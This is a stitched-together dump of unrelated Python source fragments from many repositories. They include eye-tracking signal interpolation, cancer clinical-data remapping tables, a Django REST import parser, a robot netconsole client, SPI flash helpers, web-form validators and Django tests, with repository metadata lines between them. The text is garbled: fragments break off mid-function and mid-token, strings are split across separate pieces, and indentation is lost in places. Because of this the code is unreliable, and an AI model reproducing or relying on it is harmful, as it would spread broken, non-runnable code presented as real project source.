xint = numpy.arange(starts[i],ends[i])
yint = intfunc(xint)
# insert interpolated values into signal
signal[xint] = yint
# # DEBUG #
# y = numpy.zeros(len(pl)) + max(signal)
# pyplot.plot(pl,y,'ro')
# pyplot.plot(signal,'r')
# # # # # #
return signal
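# # EXAMPLE # #
# Illustrative usage only (not part of the original module); the trace and
# the simulated blink below are made up for demonstration, and the keyword
# values are simply the function defaults:
# trace = numpy.ones(500) * 1000.0
# trace[200:240] -= numpy.linspace(0, 900, 40)	# simulated eyelid closing
# trace[240:280] -= numpy.linspace(900, 0, 40)	# simulated eyelid opening
# clean = interpolate_blink(trace, mode='auto', velthresh=5, maxdur=500, margin=10)
# # # # # # #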
def interpolate_missing(signal, mode='auto', mindur=5, margin=10, invalid=-1):
"""Returns signal with interpolated results, based on a cubic or linear
interpolation of the invalid data in the signal
arguments
signal -- a vector (i.e. a NumPy array) containing a single
trace of your signal
keyword arguments
mode -- string indicating what kind of interpolation to use:
'linear' for a linear interpolation
'cubic' for a cubic interpolation
				'auto' for a cubic interpolation if possible (i.e.
when more than four data points are available)
and linear when this is not the case
(default = 'auto')
mindur -- minimal amount of consecutive samples to interpolate
cubically; otherwise a linear interpolation is used;
this is to prevent weird results in the interpolation
of very short strings of missing data (default = 5)
margin -- margin (in samples) to compensate for missing duration
				underestimation; missing is extended for detected start
minus margin, and detected end plus margin; this helps
in reducing errors in blink interpolation that has not
been done by interpolate_blink (default = 10)
invalid -- a single value coding for invalid data, e.g. -1 or 0.0
(default = -1)
returns
signal -- a NumPy array containing the interpolated signal
"""
# # # # #
# input errors
# wrong interpolation method
if mode not in ['auto','linear','cubic']:
raise Exception("Error in pyenalysis.interpolate_missing: mode '%s' is not supported, please use one of the following: 'auto','linear','cubic'" % mode)
# wrong signal dimension
if signal.ndim != 1:
raise Exception("Error in pyenalysis.interpolate_missing: input is not a single signal trace, but has %d dimensions; please provide a 1-dimension
|
cancerregulome/gidget
|
commands/feature_matrix_construction/main/cleanClinTSV.py
|
Python
|
mit
| 98,495 | 0.004041 |
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
import miscClin
import tsvIO
import sys
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
remapDict = {}
DAYS_PER_YEAR = 365.2425
# ------------------------------------------------------------------------- ##
# DEPENDING ON WHICH TUMOR TYPE IS BEING PROCESSED, THESE SWITCHES MAY
# NEED TO BE CHANGED ...
remapDict["anatomic_organ_subdivision"] = {}
if (1):
remapDict["anatomic_organ_subdivision"]["na"] = "NA"
remapDict["anatomic_organ_subdivision"]["rectum"] = 0
remapDict["anatomic_organ_subdivision"]["rectosigmoid_junction"] = 1
remapDict["anatomic_organ_subdivision"]["sigmoid_colon"] = 2
remapDict["anatomic_organ_subdivision"]["descending_colon"] = 3
remapDict["anatomic_organ_subdivision"]["splenic_flexure"] = 4
remapDict["anatomic_organ_subdivision"]["transverse_colon"] = 5
remapDict["anatomic_organ_subdivision"]["hepatic_flexure"] = 6
remapDict["anatomic_organ_subdivision"]["ascending_colon"] = 7
remapDict["anatomic_organ_subdivision"]["cecum"] = 8
if (0):
remapDict["anatomic_organ_subdivision"]["na"] = "NA"
remapDict["anatomic_organ_subdivision"]["bilateral"] = "bilateral"
remapDict["anatomic_organ_subdivision"]["left"] = "left"
remapDict["anatomic_organ_subdivision"]["right"] = "right"
if (0):
remapDict["anatomic_organ_subdivision"][""] = "NA"
remapDict["anatomic_organ_subdivision"]["na"] = "NA"
remapDict["anatomic_organ_subdivision"]["brain"] = "brain"
remapDict["histological_type"] = {}
if (0):
remapDict["histological_type"
|
]["na"] = "NA"
remapDict["histological_type"]["colon_adenocarcinoma"] = 0
remapDict["histological_type"]["rectal_adenocarcin
|
oma"] = 0
remapDict["histological_type"]["colon_mucinous_adenocarcinoma"] = 1
remapDict["histological_type"]["rectal_mucinous_adenocarcinoma"] = 1
if (0):
remapDict["histological_type"]["na"] = "NA"
remapDict["histological_type"][
"untreated_primary_(de_novo)_gbm"] = "de_novo"
remapDict["histological_type"]["treated_primary_gbm"] = "primary"
remapDict["ethnicity"] = {}
remapDict["ethnicity"]["hispanic_or_latino"] = "hispanic"
remapDict["ethnicity"]["not_hispanic_or_latino"] = "not_hispanic"
# ------------------------------------------------------------------------- ##
remapDict["tumor_grade"] = {}
remapDict["tumor_grade"]["na"] = "NA"
remapDict["tumor_grade"]["gx"] = "NA"
remapDict["tumor_grade"]["gb"] = "NA"
remapDict["tumor_grade"]["g1"] = 1
remapDict["tumor_grade"]["g2"] = 2
remapDict["tumor_grade"]["g3"] = 3
remapDict["tumor_grade"]["g4"] = 4
remapDict["tumor_grade"]["high grade"] = 3 # ???
remapDict["tumor_grade"]["high_grade"] = 3 # ???
if (0):
remapDict["tumor_stage"] = {}
remapDict["tumor_stage"]["na"] = "NA"
remapDict["tumor_stage"]["i"] = 1
remapDict["tumor_stage"]["ia"] = 1.2
remapDict["tumor_stage"]["ib"] = 1.4
remapDict["tumor_stage"]["ic"] = 1.6
remapDict["tumor_stage"]["ii"] = 2
remapDict["tumor_stage"]["iia"] = 2.2
remapDict["tumor_stage"]["iib"] = 2.4
remapDict["tumor_stage"]["iic"] = 2.6
remapDict["tumor_stage"]["iii"] = 3
remapDict["tumor_stage"]["iiia"] = 3.2
remapDict["tumor_stage"]["iiib"] = 3.4
remapDict["tumor_stage"]["iiic"] = 3.6
remapDict["tumor_stage"]["iv"] = 4
remapDict["tumor_stage"]["iva"] = 4.2
remapDict["tumor_stage"]["ivb"] = 4.4
remapDict["tumor_stage"]["ivc"] = 4.6
remapDict["breast_tumor_pathologic_grouping_stage"] = {}
remapDict["breast_tumor_pathologic_grouping_stage"]["na"] = "NA"
remapDict["breast_tumor_pathologic_grouping_stage"]["x"] = "NA"
remapDict["breast_tumor_pathologic_grouping_stage"]["tis"] = 0.5
remapDict["breast_tumor_pathologic_grouping_stage"]["i"] = 1
remapDict["breast_tumor_pathologic_grouping_stage"]["ia"] = 1.2
remapDict["breast_tumor_pathologic_grouping_stage"]["ib"] = 1.4
remapDict["breast_tumor_pathologic_grouping_stage"]["ii"] = 2
remapDict["breast_tumor_pathologic_grouping_stage"]["iia"] = 2.2
remapDict["breast_tumor_pathologic_grouping_stage"]["iib"] = 2.4
remapDict["breast_tumor_pathologic_grouping_stage"]["iic"] = 2.6
remapDict["breast_tumor_pathologic_grouping_stage"]["iii"] = 3
remapDict["breast_tumor_pathologic_grouping_stage"]["iiia"] = 3.2
remapDict["breast_tumor_pathologic_grouping_stage"]["iiib"] = 3.4
remapDict["breast_tumor_pathologic_grouping_stage"]["iiic"] = 3.6
remapDict["breast_tumor_pathologic_grouping_stage"]["iv"] = 4
remapDict["primary_tumor_pathologic_spread"] = {}
remapDict["primary_tumor_pathologic_spread"]["na"] = "NA"
remapDict["primary_tumor_pathologic_spread"]["tx"] = "NA"
remapDict["primary_tumor_pathologic_spread"]["t0"] = 0
remapDict["primary_tumor_pathologic_spread"]["tis"] = 0.5
remapDict["primary_tumor_pathologic_spread"]["t1"] = 1
remapDict["primary_tumor_pathologic_spread"]["t1a"] = 1.2
remapDict["primary_tumor_pathologic_spread"]["t1b"] = 1.4
remapDict["primary_tumor_pathologic_spread"]["t2"] = 2
remapDict["primary_tumor_pathologic_spread"]["t2a"] = 2.2
remapDict["primary_tumor_pathologic_spread"]["t2b"] = 2.4
remapDict["primary_tumor_pathologic_spread"]["t3"] = 3
remapDict["primary_tumor_pathologic_spread"]["t3a"] = 3.2
remapDict["primary_tumor_pathologic_spread"]["t3b"] = 3.4
remapDict["primary_tumor_pathologic_spread"]["t3c"] = 3.6
remapDict["primary_tumor_pathologic_spread"]["t4"] = 4
remapDict["primary_tumor_pathologic_spread"]["t4a"] = 4.2
remapDict["primary_tumor_pathologic_spread"]["t4b"] = 4.4
remapDict["breast_tumor_pathologic_t_stage"] = {}
remapDict["breast_tumor_pathologic_t_stage"]["na"] = "NA"
remapDict["breast_tumor_pathologic_t_stage"]["tx"] = "NA"
remapDict["breast_tumor_pathologic_t_stage"]["t1"] = 1
remapDict["breast_tumor_pathologic_t_stage"]["t1a"] = 1.2
remapDict["breast_tumor_pathologic_t_stage"]["t1b"] = 1.4
remapDict["breast_tumor_pathologic_t_stage"]["t1c"] = 1.6
remapDict["breast_tumor_pathologic_t_stage"]["t2"] = 2
remapDict["breast_tumor_pathologic_t_stage"]["t2a"] = 2.2
remapDict["breast_tumor_pathologic_t_stage"]["t2b"] = 2.4
remapDict["breast_tumor_pathologic_t_stage"]["t2c"] = 2.6
remapDict["breast_tumor_pathologic_t_stage"]["t3"] = 3
remapDict["breast_tumor_pathologic_t_stage"]["t3a"] = 3.4
remapDict["breast_tumor_pathologic_t_stage"]["t3b"] = 3.4
remapDict["breast_tumor_pathologic_t_stage"]["t3c"] = 3.6
remapDict["breast_tumor_pathologic_t_stage"]["t4"] = 4
remapDict["breast_tumor_pathologic_t_stage"]["t4a"] = 4.2
remapDict["breast_tumor_pathologic_t_stage"]["t4b"] = 4.4
remapDict["breast_tumor_pathologic_t_stage"]["t4c"] = 4.6
remapDict["breast_tumor_pathologic_t_stage"]["t4d"] = 4.8
remapDict["breast_carcinoma_estrogen_receptor_status"] = {}
remapDict["breast_carcinoma_estrogen_receptor_status"]["na"] = "NA"
remapDict["breast_carcinoma_estrogen_receptor_status"]["not_performed"] = "NA"
remapDict["breast_carcinoma_estrogen_receptor_status"][
"performed_but_not_available"] = "NA"
remapDict["breast_carcinoma_estrogen_receptor_status"][
"indeterminate"] = "indeterminate"
remapDict["breast_carcinoma_estrogen_receptor_status"]["positive"] = "positive"
remapDict["breast_carcinoma_estrogen_receptor_status"]["negative"] = "negative"
remapDict["lymphnode_pathologic_spread"] = {}
remapDict["lymphnode_pathologic_spread"]["na"] = "NA"
remapDict["lymphnode_pathologic_spread"]["nx"] = "NA"
remapDict["lymphnode_pathologic_spread"]["n0"] = 0
remapDict["lymphnode_pathologic_spread"]["n1"] = 1
remapDict["lymphnode_pathologic_spread"]["n1a"] = 1.2
remapDict["lymphnode_pathologic_spread"]["n1b"] = 1.4
remapDict["lymphnode_pathologic_spread"]["n1c"] = 1.6
remapDict["lymphnode_pathologic_spread"]["n2"] = 2
remapDict["lymphnode_pathologic_spread"]["n2a"] = 2.2
remapDict["lymphnode_pathologic_spread"]["n2b"] = 2.4
remapDict["lymphnode_pathologic_spread"]["n2c"] = 2.6
remapDict["lymphnode_pathologic_spread"]["n3"] = 3
remapDict["lymphnode_pathologic_spread"]["n3a"] = 3.2
remapDict["breast_tumor_pathologic_n_stage"] = {}
remapDict["breast_tumor_pathologic_n_stage"]["na"] = "NA"
remapDict["breast_tumor_pathologic_n_stage"]["pnx"] = "NA"
remapDict["br
npardington/fabric-bolt | fabric_bolt/task_runners/socketio/__init__.py | Python | mit | 241 | 0
from ..base import BaseTaskRunnerBackend
class SocketIOBackend(BaseTaskRunnerBackend):
    def __init__(self):
        from . import sockets
    def get_detail_template(self):
        return 'task_runners/deployment_detail_socketio.html'
skyoo/jumpserver | apps/common/drf/parsers/base.py | Python | gpl-2.0 | 4,553 | 0.001349
import abc
import json
import codecs
from rest_framework import serializers
from django.utils.translation import ugettext_lazy as _
from rest_framework.parsers import BaseParser
from rest_framework import status
from rest_framework.exceptions import ParseError, APIException
from common.utils import get_logger
logger = get_logger(__file__)
class FileContentOverflowedError(APIException):
status_code = status.HTTP_400_BAD_REQUEST
default_code = 'file_content_overflowed'
default_detail = _('The file content overflowed (The maximum length `{}` bytes)')
class BaseFileParser(BaseParser):
FILE_CONTENT_MAX_LENGTH = 1024 * 1024 * 10
serializer_cls = None
def check_content_length(self, meta):
content_length = int(meta.get('CONTENT_LENGTH', meta.get('HTTP_CONTENT_LENGTH', 0)))
if content_length > self.FILE_CONTENT_MAX_LENGTH:
msg = FileContentOverflowedError.default_detail.format(self.FILE_CONTENT_MAX_LENGTH)
logger.error(msg)
raise FileContentOverflowedError(msg)
@staticmethod
def get_stream_data(stream):
stream_data = stream.read()
stream_data = stream_data.strip(codecs.BOM_UTF8)
return stream_data
@abc.abstractmethod
def generate_rows(self, stream_data):
        raise NotImplementedError
def get_column_titles(self, rows):
return next(rows)
def convert_to_field_names(self, column_titles):
fields_map = {}
fields = self.serializer_cls().fields
fields_map.update({v.label: k for k, v in fields.items()})
fields_map.update({k: k for k, _ in fields.items()})
field_names = [
fields_map.get(column_title.strip('*'), '')
for column_title in column_titles
]
return field_names
@staticmethod
def _replace_chinese_quote(s):
trans_table = str.maketrans({
'“': '"',
'”': '"',
'‘': '"',
'’': '"',
'\'': '"'
})
return s.translate(trans_table)
@classmethod
    def process_row(cls, row):
"""
构建json数据前的行处理
"""
new_row = []
for col in row:
            # Convert Chinese-style quotation marks
col = cls._replace_chinese_quote(col)
            # Convert JSON-like strings into lists/dicts
if isinstance(col, str) and (
(col.startswith('[') and col.endswith(']'))
or
(col.startswith("{") and col.endswith("}"))
):
col = json.loads(col)
new_row.append(col)
return new_row
def process_row_data(self, row_data):
"""
构建json数据后的行数据处理
"""
new_row_data = {}
serializer_fields = self.serializer_cls().fields
for k, v in row_data.items():
            if isinstance(v, (list, dict)) or (isinstance(v, str) and k.strip() and v.strip()):
                # Fix fields like disk_info arriving as the string '{}'
if not isinstance(v, str) and isinstance(serializer_fields[k], serializers.CharField):
v = str(v)
new_row_data[k] = v
return new_row_data
def generate_data(self, fields_name, rows):
data = []
for row in rows:
            # Skip empty rows
if not any(row):
continue
row = self.process_row(row)
row_data = dict(zip(fields_name, row))
row_data = self.process_row_data(row_data)
data.append(row_data)
return data
def parse(self, stream, media_type=None, parser_context=None):
parser_context = parser_context or {}
try:
view = parser_context['view']
meta = view.request.META
self.serializer_cls = view.get_serializer_class()
except Exception as e:
logger.debug(e, exc_info=True)
raise ParseError('The resource does not support imports!')
self.check_content_length(meta)
try:
stream_data = self.get_stream_data(stream)
rows = self.generate_rows(stream_data)
column_titles = self.get_column_titles(rows)
field_names = self.convert_to_field_names(column_titles)
data = self.generate_data(field_names, rows)
return data
except Exception as e:
logger.error(e, exc_info=True)
raise ParseError('Parse error! ({})'.format(self.media_type))
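# --- Illustrative sketch (not part of the original file) ---
# A minimal concrete parser built on BaseFileParser, assuming a plain UTF-8
# CSV upload; the serializer class is supplied by the view, as in parse() above.
import csv
class ExampleCSVFileParser(BaseFileParser):
    media_type = 'text/csv'
    def generate_rows(self, stream_data):
        # BaseFileParser hands us raw bytes; decode and iterate CSV rows lazily
        lines = stream_data.decode('utf-8').splitlines()
        for row in csv.reader(lines):
            yield row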
robotpy/pynetconsole | netconsole/netconsole.py | Python | isc | 6,782 | 0.000885
from argparse import ArgumentParser
import socket
import struct
import sys
import threading
import time
from ._fakeds import FakeDS
__all__ = ["Netconsole", "main", "run"]
def _output_fn(s):
sys.stdout.write(
s.encode(sys.stdout.encoding, errors="replace").decode(sys.stdout.encoding)
)
sys.stdout.write("\n")
class StreamEOF(IOError):
pass
class Netconsole:
"""
Implements the 2018+ netconsole protocol
"""
TAG_ERROR = 11
TAG_INFO = 12
def __init__(self, printfn=_output_fn):
self.frames = {self.TAG_ERROR: self._onError, self.TAG_INFO: self._onInfo}
self.cond = threading.Condition()
self.sock = None
self.sockrfp = None
self.sockwfp = None
self.sockaddr = None
self.running = False
self.printfn = printfn
def start(self, address, port=1741, connect_event=None, block=True):
with self.cond:
if self.running:
raise ValueError("Cannot start without stopping first")
self.sockaddr = (address, port)
self.connect_event = connect_event
self.running = True
self._rt = threading.Thread(
target=self._readThread, name="nc-read-thread", daemon=True
)
self._rt.start()
if block:
self._keepAlive()
else:
self._kt = threading.Thread(
target=self._keepAlive, name="nc-keepalive-thread", daemon=True
)
self._kt.start()
@property
def connected(self):
return self.sockrfp is not None
def stop(self):
with self.cond:
self.running = False
self.cond.notify_all()
self.sock.close()
def _connectionDropped(self):
print(".. connection dropped", file=sys.stderr)
self.sock.close()
with self.cond:
self.sockrfp = None
self.cond.notify_all()
def _keepAliveReady(self):
if not self.running:
return -1
elif not self.connected:
return -2
def _keepAlive(self):
while self.running:
with self.cond:
ret = self.cond.wait_for(self._keepAliveReady, timeout=2.0)
if ret == -1:
return
elif ret == -2:
self._reconnect()
else:
try:
self.sockwfp.write(b"\x00\x00")
self.sockwfp.flush()
except IOError:
self._connectionDropped()
def _readThreadReady(self):
if not self.running:
return -1
return self.sockrfp
def _readThread(self):
        while True:
with self.cond:
sockrfp = self.cond.wait_for(self._readThreadReady)
if sockrfp == -1:
return
try:
data = sockrfp.read(self._headerSz)
except IOError:
data = ""
if len(data) != self._headerSz:
self._connectionDropped()
continue
blen, tag = self._header.unpack(data)
blen -= 1
try:
buf = sockrfp.read(blen)
except IOError:
buf = ""
if len(buf) != blen:
self._connectionDropped()
continue
# process the frame
fn = self.frames.get(tag)
if fn:
fn(buf)
else:
print("ERROR: Unknown tag %s; Ignoring..." % tag, file=sys.stderr)
def _reconnect(self):
# returns once the socket is connected or an exit is requested
while self.running:
sys.stderr.write("Connecting to %s:%s..." % self.sockaddr)
try:
sock = socket.create_connection(self.sockaddr, timeout=3.0)
except IOError:
sys.stderr.write(" :(\n")
# don't busywait, just in case
time.sleep(1.0)
continue
else:
sys.stderr.write("OK\n")
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
sock.settimeout(None)
sockrfp = sock.makefile("rb")
sockwfp = sock.makefile("wb")
if self.connect_event:
self.connect_event.set()
with self.cond:
self.sock = sock
self.sockrfp = sockrfp
self.sockwfp = sockwfp
self.cond.notify_all()
break
#
# Message
#
_header = struct.Struct(">Hb")
_headerSz = _header.size
_errorFrame = struct.Struct(">fHHiB")
_errorFrameSz = _errorFrame.size
_infoFrame = struct.Struct(">fH")
_infoFrameSz = _infoFrame.size
_slen = struct.Struct(">H")
_slenSz = _slen.size
def _onError(self, b):
ts, _seq, _numOcc, errorCode, flags = self._errorFrame.unpack_from(b, 0)
details, nidx = self._getStr(b, self._errorFrameSz)
location, nidx = self._getStr(b, nidx)
callStack, _ = self._getStr(b, nidx)
self.printfn(
"[%0.2f] %d %s %s %s" % (ts, errorCode, details, location, callStack)
)
def _getStr(self, b, idx):
sidx = idx + self._slenSz
(blen,) = self._slen.unpack_from(b, idx)
nextidx = sidx + blen
return b[sidx:nextidx].decode("utf-8", errors="replace"), nextidx
def _onInfo(self, b):
ts, _seq = self._infoFrame.unpack_from(b, 0)
msg = b[self._infoFrameSz :].decode("utf-8", errors="replace")
self.printfn("[%0.2f] %s" % (ts, msg))
def run(address, connect_event=None, fakeds=False):
"""
Starts the netconsole loop. Note that netconsole will only send output
if the DS is connected. If you don't have a DS available, the 'fakeds'
flag can be specified to fake a DS connection.
:param address: Address of the netconsole server
:param connect_event: a threading.event object, upon which the 'set'
function will be called when the connection has
succeeded.
:param fakeds: Fake a driver station connection
"""
if fakeds:
ds = FakeDS()
ds.start(address)
nc = Netconsole()
nc.start(address, connect_event=connect_event)
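# Illustrative usage (a sketch, not part of the original module). run() blocks
# inside Netconsole.start(), so call it from the main thread; the robot
# address below is made up:
#
#   run("10.12.34.2", fakeds=True)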
def main():
parser = ArgumentParser()
parser.add_argument("address", help="Address of Robot")
parser.add_argument(
"-f",
"--fakeds",
action="store_true",
default=False,
help="Fake a driver station connection to the robot",
)
args = parser.parse_args()
run(args.address, fakeds=args.fakeds)
Zephor5/zspider | zspider/pipelines/test_result.py | Python | mit | 283 | 0
# coding=utf-8
__author__ = "
|
zephor"
class TestResultPipeLine(object):
@classmethod
def from_crawler(cls, crawler):
crawler.spider.test_result = []
return cls()
@staticmethod
def process_item(item, spider):
        spider.test_result.append(item)
lgnq/RPI8836 | issi.py | Python | lgpl-3.0 | 2,227 | 0.015267
#!/usr/bin/env python
#-*- coding: utf-8 -*-
import define
import tw8836
import spi
def quad_check():
status = spi.status1_read()
if (status & 0x40):
print 'SPI flash is already in QUAD mode'
return define.TRUE
else:
print 'SPI flash is not in QUAD mode yet'
return define.FALSE
def quad_enable():
status = spi.status1_read()
spi.write_enable()
spi.status1_write(status | 0x40)
spi.write_disable()
def quad_disable():
status = spi.status1_read()
spi.write_enable()
spi.status1_write(status & ~0x40)
spi.write_disable()
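# Illustrative helper (a sketch, not part of the original file): make sure the
# flash is in QUAD mode before issuing quad I/O commands, using the functions
# defined above.
def quad_ensure():
    if quad_check() == define.FALSE:
        quad_enable()
    return quad_check()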
def four_byte_check():
status = spi.status2_read()
if (status & 0x20):
if define.DEBUG == define.ON:
print 'SPI flash is in 4 Byte mode'
spi.bank_address_register_write(0x80)
return define.TRUE
else:
if define.DEBUG == define.ON:
print 'SPI flash is not in 4 Byte mode'
spi.bank_address_register_write(0x0)
        return define.FALSE
def four_byte_enter():
tw8836.write_page(0x04)
tw8836.write(0xF3, (spi.DMA_DEST_CHIPREG << 6) + spi.DMA_CMD_COUNT_1)
tw8836.write(0xF5, 0) #length high
tw8836.write(0xF8, 0) #length middle
tw8836.write(0xF9, 0) #length low
tw8836.write(0xFA, spi.SPICMD_EN4B)
tw8836.write(0xF4, spi.SPI_CMD_OPT_NONE | spi.DMA_START)
def four_byte_exit():
tw8836.write_page(0x04)
tw8836.write(0xF3, (spi.DMA_DEST_CHIPREG << 6) + spi.DMA_CMD_COUNT_1)
tw8836.write(0xF5, 0) #length high
tw8836.write(0xF8, 0) #length middle
tw8836.write(0xF9, 0) #length low
tw8836.write(0xFA, spi.SPICMD_EX4B)
tw8836.write(0xF4, spi.SPI_CMD_OPT_NONE | spi.DMA_START)
def erase_fail_check():
status = spi.security_register_read()
if (status & 0x40):
print 'erase failed'
spi.sr_clear()
return define.TRUE
else:
print 'erase succeed'
return define.FALSE
def dummy_cycles_config(mode, cycles):
print 'dummy_cycles_config in issi.py'
status2_register = spi.status2_read()
print hex(status2_register)
DanielNeugebauer/adhocracy | src/adhocracy/forms/common.py | Python | agpl-3.0 | 30,325 | 0.000297
import csv
from datetime import datetime
import re
from StringIO import StringIO
from PIL import Image
import formencode
from pylons import tmpl_context as c
from pylons.i18n import _
from webhelpers.html import literal
from sqlalchemy import func
from adhocracy import config
from adhocracy.lib.auth import can
from adhocracy.lib.unicode import UnicodeDictReader
FORBIDDEN_NAMES = ["www", "static", "mail", "edit", "create", "settings",
"join", "leave", "control", "test", "support", "page",
"proposal", "wiki", "blog", "proposals", "admin", "dl",
"downloads", "stats", "branch", "merge", "pull", "push",
"hg", "git", "adhocracy", "user", "openid", "auth", "watch",
"poll", "delegation", "event", "comment", "root", "search",
"tag", "svn", "trac", "lists", "list", "new", "update",
"variant", "provision", "untag", "code", "sso", "velruse"]
VALIDUSER = re.compile(r"^[a-zA-Z0-9_\-]{3,255}$")
VALIDVARIANT = re.compile(r"^[\w\-_ ]{1,255}$", re.U)
TIME = re.compile(r"\d{1,2}.\d{1,2}.\d{4}")
class UniqueUsername(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import meta, User
if not value or not isinstance(value, basestring):
raise formencode.Invalid(
_('No username is given'),
value, state)
if len(value.strip()) < 3:
raise formencode.Invalid(
_('Username is too short'),
value, state)
if not VALIDUSER.match(value) or value in FORBIDDEN_NAMES:
raise formencode.Invalid(
_('The username is invalid'),
value, state)
if meta.Session.query(User.user_name).filter(
func.lower(User.user_name) == value.lower()
).count():
raise formencode.Invalid(
_('That username already exists'),
value, state)
return value
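# Illustrative usage (a sketch, not part of the original module): validators
# like these plug into a formencode Schema; to_python() raises
# formencode.Invalid with a translated message on bad input. The schema name
# below is made up:
#
#   class ExampleRegisterSchema(formencode.Schema):
#       user_name = UniqueUsername(not_empty=True)
#       email = formencode.All(formencode.validators.Email(), UniqueEmail())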
class UniqueEmail(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import User
if User.all_q()\
.filter(func.lower(User.email) == value.lower()).count():
raise formencode.Invalid(
_('That email is already registered'),
value, state)
return value
class UniqueOtherEmail(formencode.FancyValidator):
"""
Check if email is unused or belongs to the current user.
"""
def _to_python(self, value, state):
if (c.user is not None and c.user.email is not None
and c.user.email.lower() == value.lower()):
return value
from adhocracy.model import User
if User.all_q()\
.filter(func.lower(User.email) == value.lower()).count():
            raise formencode.Invalid(
                _('That email is already used by another account'),
value, state)
return value
class ValidLocale(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy import i18n
if value in i18n.LOCALE_STRINGS:
return value
else:
raise formencode.Invalid(_('Invalid locale choice'), value, state)
class ValidDate(formencode.FancyValidator):
def _to_python(self, value, state):
if not TIME.match(value):
raise formencode.Invalid(
_('Invalid date, expecting DD.MM.YYYY'),
value, state)
try:
return datetime.strptime(value, "%d.%m.%Y")
except ValueError:
raise formencode.Invalid(
_('Invalid date, expecting DD.MM.YYYY'),
value, state)
return value
class ValidHTMLColor(formencode.validators.Regex):
regex = r'^#[0-9a-fA-F]{1,6}'
def to_python(self, value, state):
try:
super(ValidHTMLColor, self).to_python(value, state)
except formencode.Invalid:
raise formencode.Invalid(
_("Please enter a html color code like '#f0f0f0'. "
"'%(value)' is not a valid color code."), value, state)
return value
class UniqueInstanceKey(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import Instance
if not value:
raise formencode.Invalid(
_('No instance key is given'),
value, state)
if not Instance.INSTANCE_KEY.match(value) or value in FORBIDDEN_NAMES:
raise formencode.Invalid(
_('The instance key is invalid'),
value, state)
if Instance.find(value):
raise formencode.Invalid(
_('An instance with that key already exists'),
value, state)
return value
class StaticPageKey(formencode.FancyValidator):
def to_python(self, value, state):
from adhocracy.lib import staticpage
if not value:
raise formencode.Invalid(
_('No static key is given'),
value, state)
if not staticpage.STATICPAGE_KEY.match(value) or value in ['new']:
raise formencode.Invalid(
_('The static key is invalid'),
value, state)
return value
class ValidDelegateable(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import Delegateable
delegateable = Delegateable.find(value)
if not delegateable:
raise formencode.Invalid(
_("No entity with ID '%s' exists") % value,
value, state)
return delegateable
class ValidProposal(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import Proposal
proposal = Proposal.find(value)
if not proposal:
raise formencode.Invalid(
_("No proposal with ID '%s' exists") % value,
value, state)
return proposal
class ValidInstanceGroup(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import Group
group = Group.by_code(value)
if not group:
raise formencode.Invalid(
_("No group with ID '%s' exists") % value,
value, state)
if not group.is_instance_group():
raise formencode.Invalid(
_("Group '%s' is no instance group") % group.code,
value, state)
return group
class ContainsChar(formencode.validators.Regex):
regex = r"[a-zA-Z]"
def to_python(self, value, state):
try:
super(ContainsChar, self).to_python(value, state)
except formencode.Invalid:
raise formencode.Invalid(_("At least one character is required"),
value, state)
return value
class ValidBadgeInstance(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import Instance
if can.badge.manage_global() or can.badge.edit_global():
if value:
instance = Instance.find(value)
if instance is None:
raise AssertionError("Could not find instance %s" % value)
return instance
return None
elif can.badge.manage_instance() or can.badge.edit_instance():
instance = Instance.find(value)
if instance is not None and instance == c.instance:
return instance
raise formencode.Invalid(
_("You're not allowed to edit global badges"),
value, state)
class ValidUserBadge(formencode.FancyValidator):
def _to_python(self, value, state):
from adhocracy.model import UserBadge
badge = UserBadge.by_id(value, instance_filter=False)
if badge is None or badge.instance not in [None, c.instance]:
raise formencode.Invalid(
_("No Badge ID '%s' exists") % value,
value, state)
        return badge
drjova/cds-demosite | cds/modules/records/minters.py | Python | gpl-2.0 | 1,381 | 0
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Persistent identifier minters."""
from __future__ import absolute_import, print_function
from .providers import CDSRecordIdProvider
def recid_minter(record_uuid, data):
    """Mint record identifiers."""
    assert 'recid' not in data
    provider = CDSRecordIdProvider.create(
        object_type='rec', object_uuid=record_uuid)
data['recid'] = int(provider.pid.pid_value)
return provider.pid
jokey2k/sentry | src/sentry/rules/actions/__init__.py | Python | bsd-3-clause | 241 | 0
"""
sentry.rules.actions
~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from .base import *  # NOQA
helenst/django | tests/foreign_object/tests.py | Python | bsd-3-clause | 18,027 | 0.003495
import datetime
from operator import attrgetter
from .models import (
Country, Person, Group, Membership, Friendship, Article,
ArticleTranslation, ArticleTag, ArticleIdea, NewsArticle)
from django.test import TestCase, skipUnlessDBFeature
from django.utils.translation import activate
from django.core.exceptions import FieldError
from django import forms
# Note that these tests are testing internal implementation details.
# ForeignObject is not part of public API.
class MultiColumnFKTests(TestCase):
def setUp(self):
# Creating countries
self.usa = Country.objects.create(name="United States of America")
self.soviet_union = Country.objects.create(name="Soviet Union")
# Creating People
self.bob = Person()
self.bob.name = 'Bob'
self.bob.person_country = self.usa
self.bob.save()
self.jim = Person.objects.create(name='Jim', person_country=self.usa)
